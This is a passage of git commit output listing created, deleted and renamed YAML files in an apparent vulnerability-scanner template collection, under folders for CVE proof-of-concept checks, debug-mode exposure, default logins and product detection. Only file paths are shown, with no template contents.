mode 100644 poc/cve/cve-2010-1659-1773.yaml create mode 100644 poc/cve/cve-2010-1714-1779.yaml delete mode 100644 poc/cve/cve-2010-1715.yaml delete mode 100644 poc/cve/cve-2010-1717-1789.yaml delete mode 100644 poc/cve/cve-2010-1718.yaml delete mode 100644 poc/cve/cve-2010-1858.yaml create mode 100644 poc/cve/cve-2010-1953-1841.yaml create mode 100644 poc/cve/cve-2010-1981.yaml create mode 100644 poc/cve/cve-2010-1982.yaml create mode 100644 poc/cve/cve-2010-2682-1960.yaml delete mode 100644 poc/cve/cve-2010-2920.yaml create mode 100644 poc/cve/cve-2010-3203-1987.yaml create mode 100644 poc/cve/cve-2010-3203.yaml delete mode 100644 poc/cve/cve-2010-4239-1997.yaml delete mode 100644 poc/cve/cve-2010-4617.yaml create mode 100644 poc/cve/cve-2010-5028-2025.yaml create mode 100644 poc/cve/cve-2010-5278-2030.yaml create mode 100644 poc/cve/cve-2010-5278.yaml delete mode 100644 poc/cve/cve-2011-2744.yaml delete mode 100644 poc/cve/cve-2011-3315-2059.yaml create mode 100644 poc/cve/cve-2011-4926.yaml delete mode 100644 poc/cve/cve-2011-5179.yaml delete mode 100644 poc/cve/cve-2012-0896-2132.yaml create mode 100644 poc/cve/cve-2012-0981.yaml create mode 100644 poc/cve/cve-2012-2371.yaml create mode 100644 poc/cve/cve-2012-4273-2198.yaml create mode 100644 poc/cve/cve-2012-4768-2207.yaml delete mode 100644 poc/cve/cve-2013-5528.yaml delete mode 100644 poc/cve/cve-2013-5979-2280.yaml create mode 100644 poc/cve/cve-2013-7240.yaml create mode 100644 poc/cve/cve-2014-2962-2313.yaml delete mode 100644 poc/cve/cve-2014-4561-2375.yaml delete mode 100644 poc/cve/cve-2014-4940.yaml create mode 100644 poc/cve/cve-2014-9094.yaml create mode 100644 poc/cve/cve-2014-9606-2430.yaml create mode 100644 poc/cve/cve-2014-9609-2437.yaml delete mode 100644 poc/cve/cve-2015-0554-2456.yaml delete mode 100644 poc/cve/cve-2015-1880-2477.yaml delete mode 100644 poc/cve/cve-2015-2166.yaml delete mode 100644 poc/cve/cve-2015-3306-2502.yaml delete mode 100644 poc/cve/cve-2015-4050.yaml create mode 100644 poc/cve/cve-2015-7780-2604.yaml delete mode 100644 poc/cve/cve-2016-1000128-2651.yaml delete mode 100644 poc/cve/cve-2016-1000132-2669.yaml delete mode 100644 poc/cve/cve-2016-1000134-2678.yaml delete mode 100644 poc/cve/cve-2016-1000143-2717.yaml create mode 100644 poc/cve/cve-2016-1000154-2740.yaml delete mode 100644 poc/cve/cve-2016-10940-2757.yaml delete mode 100644 poc/cve/cve-2016-6210.yaml delete mode 100644 poc/cve/cve-2016-7552-2812.yaml create mode 100644 poc/cve/cve-2017-12542-2884.yaml delete mode 100644 poc/cve/cve-2017-12615.yaml delete mode 100644 poc/cve/cve-2017-14535-2928.yaml delete mode 100644 poc/cve/cve-2017-15647-2955.yaml create mode 100644 poc/cve/cve-2017-15944-2965.yaml delete mode 100644 poc/cve/cve-2017-17451-2983.yaml delete mode 100644 poc/cve/cve-2017-18536-2995.yaml delete mode 100644 poc/cve/cve-2017-3528-3012.yaml delete mode 100644 poc/cve/cve-2017-5487.yaml create mode 100644 poc/cve/cve-2017-5521-3027.yaml create mode 100644 poc/cve/cve-2017-5631-3031.yaml delete mode 100644 poc/cve/cve-2017-6090-3044.yaml delete mode 100644 poc/cve/cve-2017-7391.yaml create mode 100644 poc/cve/cve-2017-8917-3078.yaml create mode 100644 poc/cve/cve-2017-9805-3104.yaml create mode 100644 poc/cve/cve-2017-9822-3106.yaml create mode 100644 poc/cve/cve-2018-1000129.yaml delete mode 100644 poc/cve/cve-2018-1000226-3139.yaml delete mode 100644 poc/cve/cve-2018-10818-3171.yaml create mode 100644 poc/cve/cve-2018-11409.yaml delete mode 100644 poc/cve/cve-2018-14064-3301.yaml delete mode 100644 poc/cve/cve-2018-14728.yaml delete mode 100644 poc/cve/cve-2018-14912-3315.yaml delete mode 100644 poc/cve/cve-2018-15517-3331.yaml delete mode 100644 poc/cve/cve-2018-16133-3358.yaml create mode 100644 poc/cve/cve-2018-16167-3359.yaml create mode 100644 poc/cve/cve-2018-16288-3365.yaml delete mode 100644 poc/cve/cve-2018-17422-3421.yaml create mode 100644 poc/cve/cve-2018-17431-3423.yaml delete mode 100644 poc/cve/cve-2018-19386.yaml delete mode 100644 poc/cve/cve-2018-19752(1).yaml delete mode 100644 poc/cve/cve-2018-19877(1).yaml delete mode 100644 poc/cve/cve-2018-20010(1).yaml create mode 100644 poc/cve/cve-2018-20011(1).yaml delete mode 100644 poc/cve/cve-2018-20470-3497.yaml delete mode 100644 poc/cve/cve-2018-20985-3507.yaml delete mode 100644 poc/cve/cve-2018-3167.yaml delete mode 100644 poc/cve/cve-2018-5233-3567.yaml create mode 100644 poc/cve/cve-2018-6008-3574.yaml delete mode 100644 poc/cve/cve-2018-6200-3578.yaml create mode 100644 poc/cve/cve-2018-6910-3585.yaml delete mode 100644 poc/cve/cve-2018-7251-3587.yaml create mode 100644 poc/cve/cve-2018-7467-3598.yaml create mode 100644 poc/cve/cve-2018-7700-3618.yaml delete mode 100644 poc/cve/cve-2018-9118-3654.yaml create mode 100644 "poc/cve/cve-2018\342\200\22314064(1).yaml" create mode 100644 poc/cve/cve-2019-1010287-3696.yaml create mode 100644 poc/cve/cve-2019-10692(1).yaml create mode 100644 poc/cve/cve-2019-11013-3719.yaml delete mode 100644 poc/cve/cve-2019-11248-3731.yaml delete mode 100644 poc/cve/cve-2019-11370(1).yaml create mode 100644 poc/cve/cve-2019-12962(1).yaml delete mode 100644 poc/cve/cve-2019-13101-3802.yaml create mode 100644 poc/cve/cve-2019-14251(1).yaml create mode 100644 poc/cve/cve-2019-15713-3887.yaml delete mode 100644 poc/cve/cve-2019-16097.yaml delete mode 100644 poc/cve/cve-2019-16123-3918.yaml create mode 100644 poc/cve/cve-2019-16278.yaml delete mode 100644 poc/cve/cve-2019-16931(1).yaml delete mode 100644 poc/cve/cve-2019-17418-3981.yaml create mode 100644 poc/cve/cve-2019-17558.yaml create mode 100644 poc/cve/cve-2019-18394.yaml create mode 100644 poc/cve/cve-2019-18665(1).yaml create mode 100644 poc/cve/cve-2019-18818-4021.yaml create mode 100644 poc/cve/cve-2019-19368.yaml delete mode 100644 poc/cve/cve-2019-19824-4053.yaml delete mode 100644 poc/cve/cve-2019-20210(1).yaml delete mode 100644 poc/cve/cve-2019-20224(1).yaml create mode 100644 poc/cve/cve-2019-20933(1).yaml delete mode 100644 poc/cve/cve-2019-2616(1).yaml delete mode 100644 poc/cve/cve-2019-2767-4117.yaml create mode 100644 poc/cve/cve-2019-6340(1).yaml create mode 100644 poc/cve/cve-2019-7238-4207.yaml create mode 100644 poc/cve/cve-2019-7609-4233.yaml delete mode 100644 poc/cve/cve-2019-8446-4252.yaml delete mode 100644 poc/cve/cve-2019-8903.yaml create mode 100644 poc/cve/cve-2019-8937-4278.yaml delete mode 100644 poc/cve/cve-2019-9082-4292.yaml create mode 100644 poc/cve/cve-2019-9915(1).yaml create mode 100644 poc/cve/cve-2020-10124(1).yaml delete mode 100644 poc/cve/cve-2020-10220.yaml delete mode 100644 poc/cve/cve-2020-11455-4397.yaml create mode 100644 poc/cve/cve-2020-11530.yaml create mode 100644 poc/cve/cve-2020-11738(1).yaml create mode 100644 poc/cve/cve-2020-11978(1).yaml create mode 100644 poc/cve/cve-2020-13117-4489.yaml create mode 100644 poc/cve/cve-2020-13121(1).yaml create mode 100644 poc/cve/cve-2020-13945-4535.yaml delete mode 100644 poc/cve/cve-2020-14181.yaml delete mode 100644 poc/cve/cve-2020-14408(1).yaml create mode 100644 poc/cve/cve-2020-14882.yaml delete mode 100644 poc/cve/cve-2020-19282-4706.yaml create mode 100644 poc/cve/cve-2020-19360-4714.yaml delete mode 100644 poc/cve/cve-2020-2036-4730.yaml delete mode 100644 poc/cve/cve-2020-20982-4740.yaml delete mode 100644 poc/cve/cve-2020-22211(1).yaml create mode 100644 poc/cve/cve-2020-22840.yaml create mode 100644 poc/cve/cve-2020-24223.yaml delete mode 100644 poc/cve/cve-2020-24391-4811.yaml delete mode 100644 poc/cve/cve-2020-25540.yaml delete mode 100644 poc/cve/cve-2020-27467-4950.yaml create mode 100644 poc/cve/cve-2020-28976-4989.yaml create mode 100644 poc/cve/cve-2020-29227-5000.yaml create mode 100644 poc/cve/cve-2020-29395.yaml create mode 100644 poc/cve/cve-2020-3452(1).yaml create mode 100644 poc/cve/cve-2020-35749-5075.yaml create mode 100644 poc/cve/cve-2020-36510(1).yaml delete mode 100644 poc/cve/cve-2020-6287.yaml delete mode 100644 poc/cve/cve-2020-7980(1).yaml create mode 100644 poc/cve/cve-2020-8194.yaml create mode 100644 poc/cve/cve-2020-8497-5317.yaml create mode 100644 poc/cve/cve-2020-8641-5330.yaml create mode 100644 poc/cve/cve-2020-8654(1).yaml create mode 100644 poc/cve/cve-2020-9043(1).yaml create mode 100644 poc/cve/cve-20200924a.yaml create mode 100644 poc/cve/cve-2021-20038-5443.yaml delete mode 100644 poc/cve/cve-2021-21287-5492.yaml create mode 100644 poc/cve/cve-2021-21745(1).yaml create mode 100644 poc/cve/cve-2021-21801-5531.yaml create mode 100644 poc/cve/cve-2021-21803-5536.yaml create mode 100644 poc/cve/cve-2021-22054(1).yaml create mode 100644 poc/cve/cve-2021-22145-5591.yaml delete mode 100644 poc/cve/cve-2021-22214-5601.yaml create mode 100644 poc/cve/cve-2021-22986-5612.yaml create mode 100644 poc/cve/cve-2021-23241-5621.yaml delete mode 100644 poc/cve/cve-2021-24146-5631.yaml delete mode 100644 poc/cve/cve-2021-24236(1).yaml delete mode 100644 poc/cve/cve-2021-24275-5661.yaml delete mode 100644 poc/cve/cve-2021-24284(1).yaml delete mode 100644 poc/cve/cve-2021-24285-5673.yaml delete mode 100644 poc/cve/cve-2021-24286(1).yaml create mode 100644 poc/cve/cve-2021-24335-5703.yaml create mode 100644 poc/cve/cve-2021-24364-5721.yaml create mode 100644 poc/cve/cve-2021-24488(1).yaml delete mode 100644 poc/cve/cve-2021-24498-5751.yaml delete mode 100644 poc/cve/cve-2021-24838-5769.yaml delete mode 100644 poc/cve/cve-2021-25033(1).yaml delete mode 100644 poc/cve/cve-2021-25075(1).yaml create mode 100644 poc/cve/cve-2021-25085(1).yaml create mode 100644 poc/cve/cve-2021-25118(1).yaml create mode 100644 poc/cve/cve-2021-26085(1).yaml delete mode 100644 poc/cve/cve-2021-27519(1).yaml create mode 100644 poc/cve/cve-2021-27748(1).yaml delete mode 100644 poc/cve/cve-2021-28149-5943.yaml delete mode 100644 poc/cve/cve-2021-28150-5949.yaml create mode 100644 poc/cve/cve-2021-28377(1).yaml create mode 100644 poc/cve/cve-2021-28918-5975.yaml create mode 100644 poc/cve/cve-2021-29490-6011.yaml delete mode 100644 poc/cve/cve-2021-29622.yaml create mode 100644 poc/cve/cve-2021-30461.yaml delete mode 100644 poc/cve/cve-2021-31249-6068.yaml delete mode 100644 poc/cve/cve-2021-3129.yaml create mode 100644 poc/cve/cve-2021-31589-6095.yaml delete mode 100644 poc/cve/cve-2021-31682-6102.yaml delete mode 100644 poc/cve/cve-2021-31805(1).yaml delete mode 100644 poc/cve/cve-2021-3223(1).yaml create mode 100644 poc/cve/cve-2021-32305-6134.yaml create mode 100644 poc/cve/cve-2021-33544-6176.yaml create mode 100644 poc/cve/cve-2021-33807-6211.yaml create mode 100644 poc/cve/cve-2021-34370-6221.yaml delete mode 100644 poc/cve/cve-2021-34643-6238.yaml delete mode 100644 poc/cve/cve-2021-35265-6245.yaml create mode 100644 poc/cve/cve-2021-36356(1).yaml delete mode 100644 poc/cve/cve-2021-37216-6280.yaml create mode 100644 poc/cve/cve-2021-37416(1).yaml create mode 100644 poc/cve/cve-2021-37580-6292.yaml create mode 100644 poc/cve/cve-2021-38702-6314.yaml delete mode 100644 poc/cve/cve-2021-38704-6317.yaml create mode 100644 poc/cve/cve-2021-38751-6320.yaml create mode 100644 poc/cve/cve-2021-39211(1).yaml create mode 100644 poc/cve/cve-2021-39226-6323.yaml delete mode 100644 poc/cve/cve-2021-39312(1).yaml delete mode 100644 poc/cve/cve-2021-41569(1).yaml delete mode 100644 poc/cve/cve-2021-41691-6460.yaml delete mode 100644 poc/cve/cve-2021-44103(1).yaml create mode 100644 poc/cve/cve-2021-44521-6556.yaml create mode 100644 poc/cve/cve-2021-44528(1).yaml create mode 100644 poc/cve/cve-2021-45428(1).yaml delete mode 100644 poc/cve/cve-2021-45968-6588.yaml delete mode 100644 poc/cve/cve-2021-46381-6597.yaml create mode 100644 poc/cve/cve-2021-46417(1).yaml create mode 100644 poc/cve/cve-2021-46422(1).yaml delete mode 100644 poc/cve/cve-2022-0208(1).yaml delete mode 100644 poc/cve/cve-2022-0543(1).yaml create mode 100644 poc/cve/cve-2022-0594(1).yaml create mode 100644 poc/cve/cve-2022-0599(1).yaml create mode 100644 poc/cve/cve-2022-0952(1).yaml delete mode 100644 poc/cve/cve-2022-0968(1).yaml delete mode 100644 poc/cve/cve-2022-1020(1).yaml delete mode 100644 poc/cve/cve-2022-1221(1).yaml create mode 100644 poc/cve/cve-2022-1392(1).yaml delete mode 100644 poc/cve/cve-2022-1597(1).yaml delete mode 100644 poc/cve/cve-2022-1713(1).yaml delete mode 100644 poc/cve/cve-2022-1815(1).yaml delete mode 100644 poc/cve/cve-2022-1904(1).yaml create mode 100644 poc/cve/cve-2022-1906(1).yaml delete mode 100644 poc/cve/cve-2022-1937(1).yaml delete mode 100644 poc/cve/cve-2022-21705(1).yaml create mode 100644 poc/cve/cve-2022-2187(1).yaml create mode 100644 poc/cve/cve-2022-22536-6662.yaml delete mode 100644 poc/cve/cve-2022-2290(1).yaml create mode 100644 poc/cve/cve-2022-22972(1).yaml delete mode 100644 poc/cve/cve-2022-24681(1).yaml create mode 100644 poc/cve/cve-2022-2486(1).yaml delete mode 100644 poc/cve/cve-2022-2487(1).yaml delete mode 100644 poc/cve/cve-2022-24899(1).yaml delete mode 100644 poc/cve/cve-2022-25323-6724.yaml delete mode 100644 poc/cve/cve-2022-26134(1).yaml create mode 100644 poc/cve/cve-2022-26135(1).yaml delete mode 100644 poc/cve/cve-2022-26352(1).yaml delete mode 100644 poc/cve/cve-2022-26564(1).yaml create mode 100644 poc/cve/cve-2022-26960(1).yaml delete mode 100644 poc/cve/cve-2022-27927(1).yaml create mode 100644 poc/cve/cve-2022-28079(1).yaml delete mode 100644 poc/cve/cve-2022-28080(1).yaml delete mode 100644 poc/cve/cve-2022-29014(1).yaml delete mode 100644 poc/cve/cve-2022-29299(1).yaml create mode 100644 poc/cve/cve-2022-29548(1).yaml delete mode 100644 poc/cve/cve-2022-30073(1).yaml create mode 100644 poc/cve/cve-2022-30489(1).yaml delete mode 100644 poc/cve/cve-2022-30776(1).yaml create mode 100644 poc/cve/cve-2022-30777(1).yaml delete mode 100644 poc/cve/cve-2022-32007(1).yaml delete mode 100644 poc/cve/cve-2022-32025(1).yaml create mode 100644 poc/cve/cve-2022-32028(1).yaml create mode 100644 poc/cve/cve-2022-32409(1).yaml create mode 100644 poc/cve/cve-2022-33119(1).yaml create mode 100644 poc/cve/cve-2022-34046(1).yaml delete mode 100644 poc/cve/cve-2022-34047(1).yaml create mode 100644 poc/cve/cve-2022-34048(1).yaml create mode 100644 poc/cve/cve-2022-34049(1).yaml delete mode 100644 poc/cve/cve-2022-35416(1).yaml create mode 100644 poc/cve/cve-2024-23334.yaml delete mode 100644 poc/cve/resin-cnnvd-200705-315-9866.yaml create mode 100644 poc/cve/resin-cnnvd-200705-315-9867.yaml create mode 100644 poc/cve/springForShell-CVE-2022-22963.yaml create mode 100644 poc/debug/airflow-debug-231.yaml delete mode 100644 poc/debug/airflow-debug-233.yaml rename poc/debug/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%) create mode 100644 poc/debug/aspx-debug-mode-575.yaml delete mode 100644 poc/debug/aspx-debug-mode-578.yaml create mode 100644 poc/debug/browserless-debugger-794.yaml delete mode 100644 poc/debug/browserless-debugger.yaml create mode 100644 poc/debug/coldfusion-debug-xss-1153.yaml delete mode 100644 poc/debug/coldfusion-debug-xss.yaml rename poc/debug/{debug-enabled-6788.yaml => debug-enabled-6789.yaml} (100%) create mode 100644 poc/debug/debug-enabled-6790.yaml create mode 100644 poc/debug/django-debug-exposed-404.yaml delete mode 100644 poc/debug/laravel-debug-enabled-8576.yaml delete mode 100644 poc/debug/laravel-debug-enabled.yaml create mode 100644 poc/debug/rails-debug-mode-9806.yaml delete mode 100644 poc/debug/rails-debug-mode-9807.yaml create mode 100644 poc/debug/symfony-debugmode-10620.yaml create mode 100644 poc/debug/wamp-xdebug-detect-11104.yaml rename poc/debug/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%) mode change 100755 => 100644 poc/debug/wp-debug-log.yaml create mode 100644 poc/default/Mantis-Default_login.yaml delete mode 100644 poc/default/Redmine-Default-Login.yaml delete mode 100644 poc/default/activemq-default-login-44.yaml create mode 100644 poc/default/activemq-default-login-48.yaml rename poc/default/{aem-default-get-servlet-137.yaml => aem-default-get-servlet-135.yaml} (100%) delete mode 100644 poc/default/aem-default-login-140.yaml delete mode 100644 poc/default/alphaweb-default-login.yaml delete mode 100644 poc/default/ambari-default-login-287.yaml create mode 100644 poc/default/ambari-default-login-289.yaml rename poc/default/{apollo-default-login-521.yaml => apollo-default-login.yaml} (100%) delete mode 100644 poc/default/arl-default-login-537.yaml rename poc/default/{azkaban-default-login-673.yaml => azkaban-default-login.yaml} (100%) create mode 100644 poc/default/canal-default-login-846.yaml delete mode 100644 poc/default/canal-default-login-849.yaml delete mode 100644 poc/default/chinaunicom-default-login-906.yaml rename poc/default/{cobbler-default-login-1119.yaml => cobbler-default-login-1118.yaml} (100%) delete mode 100644 poc/default/cobbler-default-login.yaml create mode 100644 poc/default/crushftp-default-login.yaml delete mode 100644 poc/default/default-apache-test-all.yaml delete mode 100644 poc/default/default-apache2-ubuntu-page.yaml delete mode 100644 poc/default/default-asp-net-page.yaml create mode 100644 poc/default/default-codeigniter-page-6833.yaml delete mode 100644 poc/default/default-detect-generic-6838.yaml create mode 100644 poc/default/default-detect-generic.yaml create mode 100644 poc/default/default-jetty-page-6862.yaml delete mode 100644 poc/default/default-lighttpd-page-6866.yaml create mode 100644 poc/default/default-lucee-page-6871.yaml create mode 100644 poc/default/default-nginx-page-6881.yaml create mode 100644 poc/default/default-openresty.yaml delete mode 100644 poc/default/default-payara-server-page-6894.yaml delete mode 100644 poc/default/default-plesk-page.yaml delete mode 100644 poc/default/default-redhat-test-page-6902.yaml rename poc/default/{dell-idrac-default-login-6943.yaml => dell-idrac-default-login.yaml} (100%) create mode 100644 poc/default/dolphinscheduler-default-login-7073.yaml rename poc/default/{dubbo-admin-default-login.yaml => dubbo-admin-default-login-7120.yaml} (100%) rename poc/default/{dvwa-default-login-7127.yaml => dvwa-default-login.yaml} (100%) delete mode 100644 poc/default/emcecom-default-login-7211.yaml create mode 100644 poc/default/emqx-default-login-7222.yaml rename poc/default/{exacqvision-default-login-7277.yaml => exacqvision-default-login.yaml} (100%) delete mode 100644 poc/default/flir-default-login-7514.yaml create mode 100644 poc/default/flir-default-login.yaml delete mode 100644 poc/default/frp-default-login-7556.yaml create mode 100644 poc/default/glpi-default-login.yaml create mode 100644 poc/default/guacamole-default-login-7859.yaml create mode 100644 poc/default/hongdian-default-login-7997.yaml delete mode 100644 poc/default/hongdian-default-login-7999.yaml delete mode 100644 poc/default/huawei-HG532e-default-router-login.yaml delete mode 100644 poc/default/hue-default-credential-8081.yaml delete mode 100644 poc/default/hue-default-credential.yaml delete mode 100644 poc/default/idemia-biometrics-default-login-8139.yaml rename poc/default/{idemia-biometrics-default-login.yaml => idemia-biometrics-default-login-8141.yaml} (100%) delete mode 100644 poc/default/iptime-default-login-8193.yaml rename poc/default/{jenkins-default.yaml => jenkins-default-8272.yaml} (100%) create mode 100644 poc/default/jinher-oa-default-login-8312.yaml delete mode 100644 poc/default/jmx-default-login-8355.yaml create mode 100644 poc/default/jmx-default-login.yaml delete mode 100644 poc/default/jupyterhub-default-login-8400.yaml create mode 100644 poc/default/kafka-center-default-login.yaml create mode 100644 poc/default/lutron-iot-default-login-8675.yaml delete mode 100644 poc/default/lutron-iot-default-login-8678.yaml create mode 100644 poc/default/nagios-default-login-8990.yaml delete mode 100644 poc/default/nagios-default-login-8994.yaml delete mode 100644 poc/default/netsus-default-login-9060.yaml create mode 100644 poc/default/netsus-default-login.yaml delete mode 100644 poc/default/nps-default-login-9145.yaml delete mode 100644 poc/default/octobercms-default-login-9192.yaml create mode 100644 poc/default/octobercms-default-login.yaml delete mode 100644 poc/default/ofbiz-default-login-9210.yaml delete mode 100644 poc/default/openemr-default-login.yaml delete mode 100644 poc/default/operations-automation-default-page-9337.yaml rename poc/default/{operations-automation-default-page.yaml => operations-automation-default-page-9339.yaml} (100%) create mode 100644 poc/default/panabit-ixcache-default-login.yaml create mode 100644 poc/default/panos-default-login-9455.yaml create mode 100644 poc/default/panos-default-login.yaml delete mode 100644 poc/default/pentaho-default-login-9478.yaml create mode 100644 poc/default/pentaho-default-login-9480.yaml create mode 100644 poc/default/rabbitmq-default-admin-9780.yaml delete mode 100644 poc/default/rabbitmq-default-admin-9782.yaml create mode 100644 poc/default/rainloop-default-login.yaml create mode 100644 poc/default/ranger-default-login-9827.yaml create mode 100644 poc/default/rockmongo-default-login-9897.yaml create mode 100644 poc/default/samsung-wlan-default-login-10018.yaml create mode 100644 poc/default/supermicro-default-login.yaml rename poc/default/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%) create mode 100644 poc/default/telecom-gateway-default-login.yaml create mode 100644 poc/default/tomcat-default-login.yaml delete mode 100644 poc/default/trilithic-viewpoint-default-10835.yaml create mode 100644 poc/default/ucmdb-default-login-10871.yaml rename poc/default/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%) delete mode 100644 poc/default/vidyo-default-login-11009.yaml rename poc/default/{vidyo-default-login.yaml => vidyo-default-login-11010.yaml} (100%) create mode 100644 poc/default/visionhub-default-login-11026.yaml delete mode 100644 poc/default/wifisky-default-password-11205.yaml delete mode 100644 poc/default/wso2-default-login.yaml delete mode 100644 poc/default/xampp-default-page-11661.yaml rename poc/default/{xampp-default-page.yaml => xampp-default-page-11662.yaml} (100%) create mode 100644 poc/default/xerox7-default-login.yaml delete mode 100644 poc/default/xxljob-default-login-11709.yaml create mode 100644 poc/detect/RedMine-Detect.yaml rename poc/detect/{acontent-detect-32.yaml => acontent-detect.yaml} (100%) rename poc/detect/{addeventlistener-detect-66.yaml => addeventlistener-detect-64.yaml} (100%) delete mode 100644 poc/detect/adobe-coldfusion-detect-82.yaml create mode 100644 poc/detect/adobe-coldfusion-error-detect-86.yaml rename poc/detect/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%) delete mode 100644 poc/detect/airflow-detect-239.yaml create mode 100644 poc/detect/airflow-detect-240.yaml delete mode 100644 poc/detect/alfresco-detect-259.yaml create mode 100644 poc/detect/alfresco-detect-260.yaml create mode 100644 poc/detect/apache-answer-detect.yaml create mode 100644 poc/detect/apache-axis-detect-339.yaml rename poc/detect/{apache-axis-detect.yaml => apache-axis-detect-341.yaml} (100%) delete mode 100644 poc/detect/apache-cocoon-detect-342.yaml create mode 100644 poc/detect/apache-cocoon-detect.yaml rename poc/detect/{apache-detect.yaml => apache-detect-346.yaml} (100%) create mode 100644 poc/detect/apollo-server-detect-523.yaml rename poc/detect/{apollo-server-detect-522.yaml => apollo-server-detect.yaml} (100%) delete mode 100644 poc/detect/artica-web-proxy-detect-545.yaml rename poc/detect/{artica-web-proxy-detect-543.yaml => artica-web-proxy-detect.yaml} (100%) create mode 100644 poc/detect/autobahn-python-detect-594.yaml delete mode 100644 poc/detect/autobahn-python-detect-595.yaml delete mode 100644 poc/detect/avantfax-detect-600.yaml delete mode 100644 poc/detect/aws-elastic-beanstalk-detect.yaml rename poc/detect/{basic-auth-detection-687.yaml => basic-auth-detection-689.yaml} (100%) delete mode 100644 poc/detect/bigbluebutton-detect-723.yaml create mode 100644 poc/detect/bigbluebutton-detect.yaml create mode 100644 poc/detect/bigip-config-utility-detect-730.yaml create mode 100644 poc/detect/bigip-config-utility-detect-732.yaml create mode 100644 poc/detect/burp-api-detect-810.yaml delete mode 100644 poc/detect/burp-api-detect-812.yaml delete mode 100644 poc/detect/cacti-detect-826.yaml delete mode 100644 poc/detect/carestream-vue-detect-861.yaml delete mode 100644 poc/detect/centreon-detect-877.yaml delete mode 100644 poc/detect/citrix-adc-gateway-detect-981.yaml create mode 100644 poc/detect/citrix-adc-gateway-detect-983.yaml delete mode 100644 poc/detect/citrix-vpn-detect-987.yaml delete mode 100644 poc/detect/cname-service-detector-1034.yaml rename poc/detect/{cockpit-detect-1127.yaml => cockpit-detect-1126.yaml} (100%) delete mode 100644 poc/detect/confluence-detect-1187.yaml create mode 100644 poc/detect/confluence-detect-1189.yaml delete mode 100644 poc/detect/craft-cms-detect.yaml create mode 100644 poc/detect/crush-ftp-detect-1272.yaml rename poc/detect/{csrfguard-detect-1290.yaml => csrfguard-detect.yaml} (100%) create mode 100644 poc/detect/custom-data-result-service-detect.yaml delete mode 100644 poc/detect/default-detect-generic-6838.yaml create mode 100644 poc/detect/default-detect-generic.yaml create mode 100644 poc/detect/dell-idrac7-detect.yaml create mode 100644 poc/detect/dell-idrac9-detect-6937.yaml create mode 100644 poc/detect/detect-dangling-cname-6967.yaml create mode 100644 poc/detect/detect-drone-config-6973.yaml rename poc/detect/{detect-options-method-6978.yaml => detect-options-method-6977.yaml} (100%) create mode 100644 poc/detect/dns-waf-detect-7052.yaml delete mode 100644 poc/detect/druid-detect-7098.yaml create mode 100644 poc/detect/dwr-index-detect-7135.yaml create mode 100644 poc/detect/dwr-index-detect.yaml delete mode 100644 poc/detect/ec2-detection-7162.yaml create mode 100644 poc/detect/ec2-detection-7163.yaml create mode 100644 poc/detect/eg-manager-detect.yaml create mode 100644 poc/detect/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/detect/epson-access-detect-7235.yaml create mode 100644 poc/detect/fanruanoa-detect-7392.yaml create mode 100644 poc/detect/fanruanoa2012-detect-7388.yaml delete mode 100644 poc/detect/fanruanoa2012-detect.yaml delete mode 100644 poc/detect/favicon-detection-7441.yaml create mode 100644 poc/detect/froxlor-detect-7553.yaml create mode 100644 poc/detect/gespage-detect-7603.yaml create mode 100644 poc/detect/github-enterprise-detect-7649.yaml delete mode 100644 poc/detect/grafana-detect-7808.yaml create mode 100644 poc/detect/graphql-detect-7830.yaml delete mode 100644 poc/detect/graphql-detect-7831.yaml delete mode 100644 poc/detect/grav-cms-detect.yaml delete mode 100644 poc/detect/gunicorn-detect-7862.yaml delete mode 100644 poc/detect/harbor-detect-7886.yaml delete mode 100644 poc/detect/herokuapp-detect-7937.yaml delete mode 100644 poc/detect/herokuapp-detect-7939.yaml create mode 100644 poc/detect/hikvision-detection-7954.yaml create mode 100644 poc/detect/hikvision-detection-7955.yaml delete mode 100644 poc/detect/hp-blade-admin-detect-8004.yaml create mode 100644 poc/detect/hp-device-info-detect-8009.yaml delete mode 100644 poc/detect/hp-device-info-detect-8010.yaml delete mode 100644 poc/detect/hp-media-vault-detect-8030.yaml create mode 100644 poc/detect/htpasswd-detection-8046.yaml delete mode 100644 poc/detect/itop-detect-8203.yaml delete mode 100644 poc/detect/jaspersoft-detect-8220.yaml create mode 100644 poc/detect/java-rmi-detect-8227.yaml create mode 100644 poc/detect/jboss-detect-8237.yaml delete mode 100644 poc/detect/jboss-detect.yaml delete mode 100644 poc/detect/jeecg-boot-detect-8248.yaml create mode 100644 poc/detect/jellyfin-detect-8259.yaml rename poc/detect/{jellyfin-detect-8258.yaml => jellyfin-detect.yaml} (100%) delete mode 100644 poc/detect/jenkins-detect-8275.yaml create mode 100644 poc/detect/jenkins-detect-8276.yaml create mode 100644 poc/detect/jira-detect-8313.yaml delete mode 100644 poc/detect/jira-detect-8314.yaml delete mode 100644 poc/detect/jsf-detection-8397.yaml create mode 100644 poc/detect/jsf-detection-8398.yaml rename poc/detect/{kibana-detect-8484.yaml => kibana-detect-8483.yaml} (100%) create mode 100644 poc/detect/linkerd-detect-8633.yaml rename poc/detect/{linkerd-detect-8632.yaml => linkerd-detect.yaml} (100%) create mode 100644 poc/detect/linkerd-service-detect-8634.yaml delete mode 100644 poc/detect/magmi-detect-8715.yaml create mode 100644 poc/detect/magmi-detect-8716.yaml delete mode 100644 poc/detect/maian-cart-detect-8719.yaml create mode 100644 poc/detect/maian-cart-detect.yaml create mode 100644 poc/detect/mantis-detect-8780.yaml delete mode 100644 poc/detect/metabase-detect-8804.yaml create mode 100644 poc/detect/microsoft-exchange-server-detect-8853.yaml create mode 100644 poc/detect/microsoft-exchange-server-detect-8854.yaml create mode 100644 poc/detect/moinmoin-detect-8916.yaml create mode 100644 poc/detect/mongodb-detect-8920.yaml create mode 100644 poc/detect/moveit-detect.yaml delete mode 100644 poc/detect/moveit-transfer-detect.yaml delete mode 100644 poc/detect/ms-adcs-detect-8960.yaml create mode 100644 poc/detect/ms-adcs-detect-8961.yaml create mode 100644 poc/detect/neos-detect.yaml create mode 100644 poc/detect/nextcloud-detect-9079.yaml delete mode 100644 poc/detect/oauth2-detect-9181.yaml delete mode 100644 poc/detect/octobercms-detect-9195.yaml create mode 100644 poc/detect/oidc-detect.yaml create mode 100644 poc/detect/oipm-detect-9219.yaml delete mode 100644 poc/detect/oipm-detect-9222.yaml delete mode 100644 